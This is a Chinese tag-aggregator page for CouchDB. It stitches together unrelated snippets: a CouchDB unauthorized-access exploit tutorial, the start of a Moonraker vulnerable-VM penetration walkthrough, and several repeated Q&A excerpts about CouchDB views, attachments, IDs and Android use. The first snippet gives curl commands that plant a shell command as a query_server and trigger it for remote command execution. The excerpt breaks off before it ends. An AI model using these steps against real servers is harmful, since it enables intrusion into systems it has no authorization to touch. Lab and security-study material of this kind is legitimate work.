couchdb

CouchDB 未授权访问漏洞

半城伤御伤魂 提交于 2020-02-24 21:16:04
0x00 CouchDB安装 CouchDB官方网站:http://couchdb.apache.org/ 一路Next直到完成安装,打开浏览器并访问以下链接:http://127.0.0.1:5984/ 可以使用以下网址与CouchDB Web界面进行交互:http://127.0.0.1:5984/_utils 0x01 漏洞利用 1、新增query_server配置,写入要执行的命令; curl -X PUT 'http://username:password@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"' 2、新建一个临时库和临时表,插入一条记录; curl -X PUT 'http://username:password@your-ip:5984/vultest' curl -X PUT 'http://username:password@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}' 3、调用query_server处理数据 curl -X POST 'http://username:password@your-ip:5984/vultest/_temp_view?limit=10' -d '

Is there anything wrong with creating Couch DB views with null values?

萝らか妹 提交于 2020-02-24 11:51:05
问题 I've been doing a fair amount of work with Couch DB in my spare time recently and really enjoy using it. I find it to be much more flexible than using a relational database, but it's not without it's disadvantages. One big disadvantage is the lack of dynamic queries / view generation... So you have to do a fair amount of work in planning and justifying your views, as you can't put that logic into your application code as you might do with SQL. For example, I wrote a login scheme based on a

Moonraker 靶机渗透

生来就可爱ヽ(ⅴ<●) 提交于 2020-02-22 08:25:29
0x01 简介 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息。 Moonraker: 1镜像下载地址: http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA 0x02 信息搜集 1.获取目标ip地址,使用netdiscover或者arp-scan。 2.使用nmap进行端口和服务探测 在3000端口发现Node.js Express framework框架应用。 访问web服务,是一段视频 视频动画会持续10几秒,之后自动跳转至如下页面 http://192.168.190.136/moonraker.html 点击blog进行一个展示界面,目前看来是没什么用 使用dirb 跑一下目录,发现 http://192.168.190.136/services/index.html 访问 http://192.168.190.136/services/index.html 在网站中发现一个链接 点击进入,一个售后服务的页面 Services Information Request To provide "out of this world" service, a Sales rep will check your web

Serving file with CouchDB attachment?

|▌冷眼眸甩不掉的悲伤 提交于 2020-02-06 04:08:54
问题 Im using Express. i can't figure out how to send an image file to client in a way that it will be displayed to HTML tag <img src='/preview/?doc=xxxxxx&image=img1.jpg'> . I'm using Cradle getAttachment function to communicate with Couchdb https://github.com/flatiron/cradle db.getAttachment(id, filename, function (err, reply) { set('Content-Type', 'image/png'); res.end(reply); }); i don't know what reply is exactly and how to transfer that image to client without buffer 回答1: To transfer an

Approaches to generate auto-incrementing numeric ids in CouchDB

我的梦境 提交于 2020-01-30 14:15:14
问题 Since CouchDB does not have support for SQL alike AUTO_INCREMENT what would be your approach to generate sequential unique numeric ids for your documents? I am using numeric ids for: User-friendly IDs (e.g. TASK-123, RQ-001, etc.) Integration with libraries/systems that require numeric primary key I am aware of the problems with replication, etc. That's why I am interested in how people try to overcome this issue. 回答1: As Dominic Barnes says, auto-increment integers are not scalable, not

Redis, CouchDB or Cassandra? [closed]

南笙酒味 提交于 2020-01-28 13:05:53
问题 Closed . This question is opinion-based. It is not currently accepting answers. Want to improve this question? Update the question so it can be answered with facts and citations by editing this post. Closed 6 years ago . What are the strengths and weaknesses of the various NoSQL databases available? In particular, it seems like Redis is weak when it comes to distributing write load over multiple servers. Is that the case? Is it a big problem? How big does a service have to grow before that

What are requirements to use CouchDB on Android?

天涯浪子 提交于 2020-01-28 06:07:07
问题 I'd like to know the requirements to use CouchDB on Android. I've found an example application and the MobileFuton. Can CouchDB be used without having an external storage and is it usable on low-end devices as it is said to have a large memory and storage footprint? Please note the related CouchDB Forum Thread 回答1: External storage (an SD card) is required for Couchbase for Android. I missed this and didn't have one configured on my emulator. Took me a bit to figure out that was the problem.

What are requirements to use CouchDB on Android?

感情迁移 提交于 2020-01-28 06:05:34
问题 I'd like to know the requirements to use CouchDB on Android. I've found an example application and the MobileFuton. Can CouchDB be used without having an external storage and is it usable on low-end devices as it is said to have a large memory and storage footprint? Please note the related CouchDB Forum Thread 回答1: External storage (an SD card) is required for Couchbase for Android. I missed this and didn't have one configured on my emulator. Took me a bit to figure out that was the problem.

What are requirements to use CouchDB on Android?

纵饮孤独 提交于 2020-01-28 06:05:07
问题 I'd like to know the requirements to use CouchDB on Android. I've found an example application and the MobileFuton. Can CouchDB be used without having an external storage and is it usable on low-end devices as it is said to have a large memory and storage footprint? Please note the related CouchDB Forum Thread 回答1: External storage (an SD card) is required for Couchbase for Android. I missed this and didn't have one configured on my emulator. Took me a bit to figure out that was the problem.

What are requirements to use CouchDB on Android?

限于喜欢 提交于 2020-01-28 06:04:29
问题 I'd like to know the requirements to use CouchDB on Android. I've found an example application and the MobileFuton. Can CouchDB be used without having an external storage and is it usable on low-end devices as it is said to have a large memory and storage footprint? Please note the related CouchDB Forum Thread 回答1: External storage (an SD card) is required for Couchbase for Android. I missed this and didn't have one configured on my emulator. Took me a bit to figure out that was the problem.
订阅 couchdb